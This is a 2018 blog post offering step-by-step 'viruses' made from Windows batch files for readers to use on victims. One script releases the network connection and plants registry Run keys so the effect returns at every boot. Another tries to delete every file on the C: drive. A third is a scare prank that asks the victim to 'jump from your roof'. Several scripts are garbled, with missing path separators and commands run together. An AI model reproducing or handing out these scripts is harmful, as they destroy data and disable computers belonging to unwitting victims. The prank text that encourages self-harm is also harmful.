Wednesday, September 5, 2018

DEVELOP AWESOME VIRUS IN THREE MINUTES

Have you ever thought of creating a Computer Virus by yourself





we all know that Virus is nothing but a malicious program or code which enters into a system without permission and affects the data and the performance of the OS......



So here is the way to create virus using batch script in THREE MINUTES.....

 

 First of all, what is batch scripting, take a look below ;

It is a series of instruction, which is executed/run automatically, line by line in the form of batch when the batch file runs.




VIRUS NO. 1 -STEPS TO CREATE VIRUS FOR DISABLING INTERNET CONNECTION FOR FOREVER....



STEP 1 -Open Notepad application....


STEP 2 -  Now, Copy (Ctrl+C) and Paste (Ctrl+V) the code given below in notepad.


echo @echo off>c:windowswimn32.bat

echo break off>c:windowswimn32.bat echo

ipconfig/release_all>c:windowswimn32.bat

echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!
PAUSE

STEP 3 - NOW save the file in ALL FILES mode with an extension ".bat "

AS SHOWN IN  THE IMAGE...




VIRUS NO. 2 - Steps for creating virus to format whole C:\ drive.....


STEP 1 - Open Notepad application....

STEP 2 -  Now, Copy (Ctrl+C) and Paste (Ctrl+V) the code given below in notepad.



@Echo off

Del C:\ *.* |y



STEP 3 - NOW save the file in ALL FILES mode with an extension ".bat "

AS SHOWN IN  THE IMAGE….










VIRUS NO. 3 - Fake virus to make victim freak out.....




STEP 1 - Open Notepad application....


STEP 2 -  Now, Copy (Ctrl+C) and Paste (Ctrl+V) the code given below in notepad.





@echo off
echo you have been hacked!
pause:


echo what is your name?
set /p name=
pause:
echo the name you have entered is %name%
pause:
echo what is your age?
set /p age=
pause:
echo the age you entered is %age% wrong
pause:


echo jump from your roof to recover your email?
set /p jump=
pause:
echo thanks for your attention
pause:
echo you are such a fool
exit;


STEP 3 - NOW save the file in ALL FILES mode with an extension ".bat "

AS SHOWN IN  THE IMAGE...

                                                             

No comments:

Post a Comment